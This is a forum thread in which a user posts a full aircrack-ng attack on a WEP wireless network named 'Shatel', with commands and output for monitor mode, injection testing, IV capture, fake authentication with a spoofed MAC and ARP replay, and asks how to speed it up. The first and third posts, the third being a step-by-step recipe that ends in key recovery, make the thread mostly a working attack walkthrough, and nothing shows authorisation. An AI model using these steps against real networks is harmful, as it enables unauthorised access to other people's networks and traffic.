Results 1 to 3 of 3

Thread: Low #/s

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    2

    Question Low #/s

    I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.

    My wireless card was:
    Code:
    root@bt:~# airmon-ng
    
    
    Interface       Chipset         Driver
    
    wlan0           Intel 4965/5xxx iwlagn - [phy0]
    I changed it to monitor mode:
    Code:
    root@bt:~# airmon-ng start wlan0 6
    
    
    Interface       Chipset         Driver
    
    wlan0           Intel 4965/5xxx iwlagn - [phy0]
                                    (monitor mode enabled on mon0)
    And then I test injection:
    Code:
    root@bt:~# aireplay-ng -9 mon0
    20:59:17  Trying broadcast probe requests...
    20:59:17  Injection is working!
    20:59:19  Found 1 AP
    
    20:59:19  Trying directed probe requests...
    20:59:19  00:23:F8:84:31:1B - channel: 6 - 'Shatel'
    20:59:21  Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
    20:59:21  30/30: 100%
    Then I started collecting IVs:
    Code:
    root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B  -w output  mon0
    
    
    CH  6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:23:F8:84:31:1B  -21 100     8943      178    0   6  54   WEP  WEP    OPN  Shatel
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:23:F8:84:31:1B  00:24:D6:11:62:18    0    0 - 1      0   411384
    And then I made a fake authentication:
    Code:
    root@bt:~# macchanger -s mon0
    Current MAC: 00:24:d6:11:62:18 (unknown)
    
    root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
    21:17:45  Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
    
    21:17:45  Sending Authentication Request (Open System) [ACK]
    21:17:45  Authentication successful
    21:17:45  Sending Association Request [ACK]
    21:17:45  Association successful :-) (AID: 1)
    
    21:17:55  Sending keep-alive packet
    And finally I started injection:
    Code:
    root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
    20:36:51  Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
    Saving ARP requests in replay_arp-0311-203651.cap
    You should also start airodump-ng to capture replies.
    Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
    But injection didn't make any change in the speed of collecting packets(#/s).

    I did this again:
    Code:
    root@bt:~# aireplay-ng -9 mon0
    21:22:49  Trying broadcast probe requests...
    21:22:51  No Answer...
    21:22:51  Found 3 APs
    
    21:22:51  Trying directed probe requests...
    21:22:51  00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
    21:22:57   0/30:   0%
    
    21:22:57  00:23:F8:84:31:1B - channel: 6 - 'Shatel'
    21:23:03   0/30:   0%
    
    21:23:03  00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
    21:23:09   0/30:   0%
    and it seems that injection is not working!

    What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)

    Thanks!

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Low #/s

    Create some traffic on the network. Keep following the aircrack-ng documentation.
    You will get there.

  3. #3
    Junior Member
    Join Date
    Apr 2010
    Posts
    47

    Default Re: Low #/s

    use this way to crack wep its easy and faster

    airdump-ng mon0

    after u chouse the wep stop the scan then type

    airodump-ng -w wep -c paste the mac here hacked --bssid ??????????? mon0

    open new shell type

    aireplay-ng -1 0 -a paste the mac here mon0
    u must see the smile face

    open new shell type

    aireplay-ng -3 -b paste the mac here mon0
    now wait tell the attack start u will see the date goin up so fast wait tell u have 30000 data then stop the attack
    type dir u must see the name
    hacked-01.cap cope the file name

    then type this command

    aircrack-ng hacked-01.cap u will have the password in 1 second

    try it and let me know if its work with u

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •